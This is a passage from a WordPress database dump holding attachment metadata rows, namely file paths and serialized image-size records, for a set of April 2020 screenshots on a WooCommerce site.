:6:\"height\";i:673;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-600x673.png\";s:5:\"width\";i:600;s:6:\"height\";i:673;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.14-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13343,5162,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.02.26.png'),(13344,5162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:742;s:6:\"height\";i:870;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.02.26.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-256x300.png\";s:5:\"width\";i:256;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-742x550.png\";s:5:\"width\";i:742;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-550x870.png\";s:5:\"width\";i:550;s:6:\"height\";i:870;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-600x704.png\";s:5:\"width\";i:600;s:6:\"height\";i:704;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-600x704.png\";s:5:\"width\";i:600;s:6:\"height\";i:704;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.26-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13345,5163,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.02.40.png'),(13346,5163,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:742;s:6:\"height\";i:870;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.02.40.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-256x300.png\";s:5:\"width\";i:256;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-742x550.png\";s:5:\"width\";i:742;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-550x870.png\";s:5:\"width\";i:550;s:6:\"height\";i:870;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-600x704.png\";s:5:\"width\";i:600;s:6:\"height\";i:704;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-600x704.png\";s:5:\"width\";i:600;s:6:\"height\";i:704;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.40-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13347,5164,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.02.52.png'),(13348,5164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:742;s:6:\"height\";i:870;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.02.52.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-256x300.png\";s:5:\"width\";i:256;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-742x550.png\";s:5:\"width\";i:742;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-550x870.png\";s:5:\"width\";i:550;s:6:\"height\";i:870;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-600x704.png\";s:5:\"width\";i:600;s:6:\"height\";i:704;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-600x704.png\";s:5:\"width\";i:600;s:6:\"height\";i:704;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.02.52-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13349,5165,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.03.10.png'),(13350,5165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:516;s:6:\"height\";i:642;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.03.10.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-241x300.png\";s:5:\"width\";i:241;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-516x300.png\";s:5:\"width\";i:516;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-516x550.png\";s:5:\"width\";i:516;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-516x550.png\";s:5:\"width\";i:516;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13351,5166,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.03.31.png'),(13352,5166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:776;s:6:\"height\";i:848;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.03.31.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-275x300.png\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-768x839.png\";s:5:\"width\";i:768;s:6:\"height\";i:839;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-776x550.png\";s:5:\"width\";i:776;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-550x848.png\";s:5:\"width\";i:550;s:6:\"height\";i:848;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-600x656.png\";s:5:\"width\";i:600;s:6:\"height\";i:656;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-600x656.png\";s:5:\"width\";i:600;s:6:\"height\";i:656;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.03.31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13353,5167,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.11.53.png'),(13354,5167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1208;s:6:\"height\";i:1180;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.11.53.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-300x293.png\";s:5:\"width\";i:300;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-16.11.53-1024x1000.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1000;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-768x750.png\";s:5:\"width\";i:768;s:6:\"height\";i:750;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.11.53-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-16.11.53-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-16.11.53-1100x1100.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-600x586.png\";s:5:\"width\";i:600;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-600x586.png\";s:5:\"width\";i:600;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.11.53-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13355,5168,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.24.46.png'),(13356,5168,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:854;s:6:\"height\";i:850;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.24.46.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-768x764.png\";s:5:\"width\";i:768;s:6:\"height\";i:764;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-854x550.png\";s:5:\"width\";i:854;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-550x850.png\";s:5:\"width\";i:550;s:6:\"height\";i:850;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-600x597.png\";s:5:\"width\";i:600;s:6:\"height\";i:597;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-600x597.png\";s:5:\"width\";i:600;s:6:\"height\";i:597;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.24.46-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13357,5169,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.25.00.png'),(13358,5169,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:672;s:6:\"height\";i:802;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.25.00.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-251x300.png\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2